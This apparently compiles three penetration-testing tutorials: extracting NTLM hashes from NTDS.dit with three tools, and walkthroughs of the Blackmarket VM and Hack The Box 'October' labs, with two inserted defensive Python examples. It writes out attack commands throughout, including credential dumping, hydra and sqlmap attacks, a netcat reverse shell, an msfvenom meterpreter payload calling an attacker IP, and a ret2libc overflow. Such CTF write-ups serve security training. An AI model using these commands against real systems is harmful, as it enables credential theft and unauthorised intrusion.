3 Ways to Extract Password Hashes from NTDS.dit


Hello friends!! Today we are going to discuss some forensic tools that are quite helpful in penetration testing for obtaining NTLM password hashes from a host machine. As we know, during a penetration test we collect a lot of material from inside the host, and if you come across files such as NTDS.dit and the SYSTEM hive, read this article to learn how to extract user information from them.

Impacket-secretsdump
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. The library provides a set of tools as examples of what can be done within the context of this library.
secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp directory) and read the rest of the data from there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach.

As described in its official definition, we mainly need two files, i.e. ntds.dit and the SYSTEM hive, to extract NTLM hashes from the database. Suppose that during a penetration test on a host machine you found the files mentioned above; then, with the help of the following command, you can extract the password hashes of the admin account and of the other accounts stored inside it.

impacket-secretsdump -system /root/Desktop/NTDS/SYSTEM -ntds /root/Desktop/NTDS/ntds.dit LOCAL
-system: path to the SYSTEM registry hive
-ntds: path to the ntds.dit file
LOCAL: tells secretsdump to parse these local files instead of connecting to a remote target
As you can observe, it has dumped the NTLM hashes from inside the ntds.dit file.



With the help of an online hash-cracking tool we try to crack the NT hash and, as shown in the given image, we got "123@password" as the result.



DSInternals PowerShell

The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of the DSInternals Framework. The main features include offline ntds.dit file manipulation and querying domain controllers through the Directory Replication Service (DRS) Remote Protocol.

This method is only applicable on Windows. To extract the NTLM hashes, use the following commands as described below.

Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals



$key = Get-Bootkey -SystemHivePath 'C:\Users\sanje\Desktop\NTDS\SYSTEM'



Get-ADDBAccount -All -DBPath 'C:\Users\sanje\Desktop\NTDS\ntds.dit' -Bootkey $key
From its result you can observe that we have successfully extracted the NTLM hashes, and now you can crack them as done above.



Ntdsxtract
The first step is to extract the tables from the NTDS.dit file; for this we use esedbexport, which comes with libesedb-tools. Libesedb is a library to access the Extensible Storage Engine (ESE) Database File (EDB) format, mainly known for its use in Microsoft Extension for prev1.edb file. The ESE database format is used in many different applications such as Windows Search, Windows Mail, Exchange and Active Directory (NTDS.dit).

Type the following commands to download the libesedb library (which provides esedbexport) and extract the tar file:

wget https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz
tar xf libesedb-experimental-20170121.tar.gz



Now install the requirements with help of following commands:
cd libesedb-20170121
apt-get install autoconf automake autopoint libtool pkg-config
./configure
make
make install
ldconfig



Now that the tool is installed, use it to dump the tables from the ntds.dit file.
esedbexport -m tables /root/Desktop/NTDS/ntds.dit
This creates a new directory named "ntds.dit.export" containing the extracted tables; the two we need are datatable and link_table.



Now download ntdsxtract, a forensic tool capable of extracting information related to user objects, group objects, computer objects and deleted objects from NTDS.dit files.


git clone https://github.com/csababarta/ntdsxtract.git



Execute the following commands to build and install it.
cd ntdsxtract
python setup.py build && python setup.py install



Extracting User Information and Password Hash
With all three files (datatable, link_table and the SYSTEM hive) it is now possible to dump user information and NT/LM password hashes. Execute the following command to obtain the NTLM hashes in John the Ripper format.

dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.6 data --syshive /root/Desktop/NTDS/SYSTEM --passwordhashes --pwdformat john --ntoutfile nthash.txt --lmoutfile lmhash.txt



As you can see, it has extracted the user information and password hashes as described above.



cat data/nthash.txt
Now you can crack these password hashes with John the Ripper.
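Whichever of the three methods produced the dump, a defender running a password audit will want to check it before (or instead of) handing it to a cracker: empty passwords, accounts that still store an LM hash, and identical NT hashes (NT hashes are unsalted, so identical hashes mean identical passwords). The following is an added example, not part of this article or of Impacket; it parses constructed lines in the user:rid:lmhash:nthash::: format that secretsdump.py prints, with made-up hashes apart from the two well-known empty-password constants.

```python
import re
from collections import defaultdict

# Well-known values: the LM hash stored when LM is absent/disabled,
# and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One dump line as secretsdump.py prints it: user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::"
)

# Constructed sample; every hash except the two constants above is made up.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (constructed sample)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
CORP\\raj:1103:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
CORP\\aarti:1104:1111111111111111aaaaaaaaaaaaaaaa:22222222222222222222222222222222:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
"""


def parse_dump(text):
    """Return a list of {user, rid, lm, nt} dicts; lines that do not match are skipped."""
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:  # status lines such as "[*] ..." do not match and are dropped
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            records.append(rec)
    return records


def audit(records):
    """Flag empty passwords, accounts still storing an LM hash, and NT-hash reuse."""
    findings = {"empty_password": [], "lm_hash_present": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for rec in records:
        if rec["nt"] == EMPTY_NT:
            findings["empty_password"].append(rec["user"])
        if rec["lm"] != EMPTY_LM:  # LM hashes are trivially crackable; policy should forbid them
            findings["lm_hash_present"].append(rec["user"])
        by_nt[rec["nt"]].append(rec["user"])
    # Identical NT hashes mean identical passwords, i.e. password reuse across accounts.
    findings["shared_nt_hash"] = {
        h: users for h, users in by_nt.items() if len(users) > 1 and h != EMPTY_NT
    }
    return findings


if __name__ == "__main__":
    for key, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print(key, value)
```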


Hack The Blackmarket VM (CTF Challenge)



BlackMarket VM was presented at Brisbane SecTalks BNE0x1B (28th Session) and is aimed at students and other InfoSec professionals. This VM has a total of 6 flags plus one r00t flag. Each flag leads to the next, and the flag format is flag {blahblah}. Download it from here.

VM Difficulty Level: Beginner/Intermediate

Penetrating Methodology
§  Network Scanning (Nmap, netdiscover)
§  Information gathering:
§  Abusing the web browser for the 1st flag
§  Generate a dictionary (Cewl)
§  FTP brute-force (hydra)
§  FTP login for the 2nd flag
§  SQL injection for the 3rd flag
§  Blackmarket login for the 4th flag
§  SquirrelMail login for the 5th flag
§  Get the ciphered mail from inside INBOX.Drafts
§  Decipher the mail and reach backdoor.php
§  Upload a backdoor shell
§  Netcat session for the 6th flag
§  Python one-liner for a proper TTY shell
§  Sudo rights privilege escalation
§  Get root access and capture the flag.

Let’s Breach!!!
Let’s start by finding the IP of the VM (here I have it at 192.168.1.104, but you will have to find your own).
netdiscover

Now let’s move on to enumeration to identify the open ports and running services of the victim’s machine using the most popular tool, Nmap.
nmap -A 192.168.1.104
As you can observe, it has dumped a lot of details about the open ports and the services running on them.





Knowing that port 80 is open on the victim’s machine, I explored its IP in a browser. It put up a Blackmarket login page, but we don’t have credentials yet, so we view its source code looking for a clue.





BOOOMMM!! Luckily I found the 1st flag in its source code, encoded in base64.
flag1 {Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}





Since the 1st flag was base64 encoded, we decode it with the following syntax.
Syntax: echo 'base64 encoded text' | base64 -d
WoW!! It reads CIA Operation Treadstone…………………




With the help of Google I found this link, and after reading the whole article it became clear to me what CIA Operation Treadstone is all about and why flag 1 held it secretly. Perhaps the Black-market login credentials could be derived from here, so I decided to generate a dictionary from the ‘Jason Bourne’ movie’s characters. By executing the following command we generate a wordlist to use as both username and password dictionary and save it as dict.txt.
cewl http://bourne.wikia.com/wiki/Operation_Treadstone -d 2 -w /root/Desktop/dict.txt




As we know, port 21 (FTP) is open, so we use the above dictionary for an FTP brute-force attack with hydra.
hydra -L dict.txt -P dict.txt 192.168.1.104 ftp
It successfully found the FTP login user: nicky password: CIA



Then, with the above credentials, we logged into FTP, found IMP.txt inside /IMPFiles and downloaded it with the following commands.
ftp 192.168.1.104
ls -al
cd ftp
ls -al
cd IMPFiles
ls -al
get IMP.txt




With the cat command we open the IMP.txt file and find flag2 inside it. We also read the given message and analyse the hint "CIA blackmarket Vehicle workshop”.
cat IMP.txt
flag2 {Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}


Looking at the above hint, I focused on “Vehicle workshop” and started probing the web server for every possible directory related to Vehicle/workshop, and eventually I retrieved the following web page when I tried http://192.168.1.104/vworkshop.

It was the dashboard of the Black-Market Auto Workshop.



After examining the whole dashboard we checked out the Spare Parts page and observed its URL. We decided to run sqlmap against it to test for SQL injection.



Then execute the following command for fetching its database name with help of sqlmap.
sqlmap -u http://192.168.1.104/vworkshop/sparepartsstoremore.php?sparepartid=1 --dbs --batch




Here I found some database names and, by my reckoning, the relevant one should be BlackMarket, so without wasting time I stepped ahead to fetch the tables from inside it.



sqlmap -u http://192.168.1.104/vworkshop/sparepartsstoremore.php?sparepartid=1 -D BlackMarket --dump-all --batch
Here I found a table “flag” and captured the 3rd flag from it.
Flag3 Find Jason Bourne Email access



Then we fetched the table “user” and found usernames with their password hashes.



With the help of an online MD5 lookup tool we reversed the above-enumerated hashes and found the following.
Username: admin |password:  cf18233438b9e88937ea0176f1311885 MD5: BigBossCIA
Username: user |password:  0d8d5cd06832b29560745fe4e1b941cf md5 (md5($pass)) : user



Then we explore the target IP in the browser again and enter the following credentials to log in.
admin
BigBossCIA

It pops up flag 4 along with a message, as shown.
flag4{bm90aGluZyBpcyBoZXJl}
Jason Bourne Email access ?????




From the Customers page I got the email ID jbourne@cia.gov of the user Jason Bourne.

At this stage I decided to use Dirb for a directory brute-force attack; here we notice /squirrelmail/, and for sure we are going to get something from here.

So we explore the URL http://192.168.1.104/squirrelmail/ and enter the credentials given below, as hinted by the 4th flag (Jason Bourne Email access ?????)
Username: jbourne@cia.gov
Password: ?????
It opens the following mailbox, as shown, and I start further enumeration.



Then, while inspecting INBOX.Drafts, I found the 5th flag inside the IMPORTANT MESSAGE mail.
Flag5 {RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}
After reading it we find some encoded text which needs to be decoded.


Then I decoded the above text as shown and, after reading it, concluded that there should be a “passpass.jpg” under the directory /kgbbackdoor inside the Blackmarket workshop which will take us to the actual backdoor.



So without wasting time I looked for the above-said path.
http://192.168.1.104/vworkshop/kgbbackdoor/PassPass.jpg

hhheheyy!!! This image must be hiding something inside; let’s download it.




Then I used the strings tool with the following command to extract the metadata from inside it.
strings PassPass.jpg
Here we found something interesting.
Pass = 5215565757312090656

The extracted metadata field “Pass” could be the password we need for the next step, so we try to decode it. Since it was in decimal (5215565757312090656) format, we first convert it to hex (4861696C4B474220) and then decode the hex as ASCII, obtaining “HailKGB”.



Slowly and gradually we are moving towards our goal, and it is getting more and more hectic for me. After penetrating further I reached the following URL, where you will find a Page Not Found error message…….
BANG ON Dear, it is an illusion, because on this page you will find a hidden login form as declared in the encrypted mail. If you still have any confusion, please read the decoded message dropped for Dimitri one more time and everything will become clear.




B0000MMM!!! Here we have accessed the backdoor about which the sender had informed Dimitri.

Now let’s enter the attacker IP 192.168.1.107 and listening port 4444, then start a netcat listener in a new terminal to receive the victim’s reverse connection.
netcat -lvp 4444



With the help of netcat we successfully spawned a shell on the victim’s VM, then opened flag.txt with cat and found the 6th and last flag of this VM. Now we need root access to finish this challenge.
cat flag.txt
flag6{Um9vdCB0aW1l}
cd /home
ls -al
cd .Mylife
ls -al
cat .secret
While reading the message I noticed something striking, i.e. DimitriHateApple; because the file is named .secret, I took DimitriHateApple as the password for the user Dimitri.



Then I tried to log in as Dimitri, and for that I first executed the following command to get a proper terminal.

python -c 'import pty; pty.spawn("/bin/bash")'
su dimitri
DimitryHateApple

Great!!! We logged in successfully; now let’s try privilege escalation for root access.
I was shocked when I checked the sudo rights of user Dimitri, because I noticed that ALL privileges are allotted.
sudo -l
(ALL:ALL) ALL
sudo su
Yehhh!! We own root access.




cd /root
ls
cat THEEND.txt
HURRAYYYY!!!! We finished this challenge.
Happy Hacking



Hack The Box : October Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “October”, which is available online for those who want to increase their skills in penetration testing and black box testing. October is a retired vulnerable lab presented by Hack the Box for online penetration practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are available online they have static IPs; the IP of this machine is 10.10.10.16, so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.16
From the image given below you can observe that ports 22 and 80 are open on the target system.




As port 80 is running an HTTP server, we open the target machine’s IP address in our browser and find that it is running October CMS.



We go to the default admin login page for octobercms at http://10.10.10.16/backend/backend/auth/signin.


We can login to this CMS with default credentials; Username: admin Password: admin


And we got admin access to October CMS. Now, to get a reverse shell, first rename your PHP payload to ‘.php5’. We use msfvenom to create a PHP payload and save it as shell.php5.
msfvenom -p php/meterpreter/reverse_tcp  lhost=10.10.14.25 lport=4444 -f raw > shell.php5
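The rename to ‘.php5’ defeats an upload filter that blocks only the literal ‘.php’ extension. As an added example (not October CMS code), here is that weak blocklist check beside the allowlist check a defender would use instead; the accepted media extensions and the script-extension set are assumptions for the example and should come from the real server configuration.

```python
import os

# A blocklist of the kind the ".php5" rename slips past: it knows only ".php".
NAIVE_BLOCKLIST = {".php"}

# What a media library should accept (assumed policy for this example).
MEDIA_ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}

# Extensions a PHP-enabled web server may hand to the interpreter. This set is an
# assumption for the example; take it from the server's own handler configuration.
SCRIPT_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}


def blocklist_allows(filename):
    """The weak check: final extension only, against a short blocklist."""
    return os.path.splitext(filename.lower())[1] not in NAIVE_BLOCKLIST


def allowlist_allows(filename):
    """The hardened check: final extension must be allowlisted, and no
    extension segment anywhere in the name may be a script extension."""
    name = os.path.basename(filename).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:  # no extension at all, or a dotfile
        return False
    extensions = ["." + p for p in parts[1:]]
    if extensions[-1] not in MEDIA_ALLOWLIST:
        return False
    # Defence in depth for servers whose handler matches any extension segment
    # (so "x.php5.jpg" could still execute): refuse script extensions anywhere.
    return not any(ext in SCRIPT_EXTENSIONS for ext in extensions)
```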



After creating the payload we set up our listener using Metasploit.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.25
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run

Now click on Media in the top toolbar, upload your PHP reverse shell and click on the public link on the right side.

As soon as we click on the link we get our reverse shell. We use the sysinfo command to check the system information of the target machine.




Now spawn a TTY shell and look for binaries in the system with the SUID bit set.
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null



We find a binary called ovrflw that has the SUID bit set. We download the file to our system using meterpreter.
meterpreter > download /usr/local/bin/ovrflw /root/Desktop




We open the file in gdb and take a look at the assembly code. At main+64 we find a call to strcpy; as strcpy performs no bounds check, we try to exploit the resulting buffer overflow.



First we create a 150-byte-long string to find the EIP offset using the pattern_create script.
./pattern_create.rb -l 150

We run the file in gdb with the 150-byte pattern as the argument and find that the EIP register is overwritten with 0x64413764.



We pass that value to /usr/share/metasploit-framework/tools/pattern_offset.rb and get an offset of 112. So we need to write 112 characters and then the address of the instructions we want executed.
./pattern_offset.rb -q 64413764 -l 150

When we try to insert shellcode into the buffer we are unable to execute it because of DEP, which prevents code on the stack from being executed. So we perform a ret2libc attack instead, reusing code already present in the process’s executable memory. On the target machine we find that ASLR is enabled, so we will have to brute-force the address. Now we find the addresses of system, exit and the string /bin/sh.
gdb /usr/local/bin/ovrflw -q
(gdb) b main
(gdb) run
(gdb) p system
(gdb) find 0xb75bd310, +9999999, "/bin/sh"
(gdb) x/s 0xb76dfbac
(gdb) p exit



Now we create our exploit, brute-forcing the address with a bash loop because of ASLR. We lay out the addresses in this order: system > exit > /bin/sh. We get the root shell as soon as the guessed address matches the actual one.

After getting the root shell we move to the /root directory, find a file called root.txt, open it and find the first flag.



After finding the first flag we go to the /home/ directory and find a directory called harry/. We go inside it, find a file called user.txt, open it and find our final flag.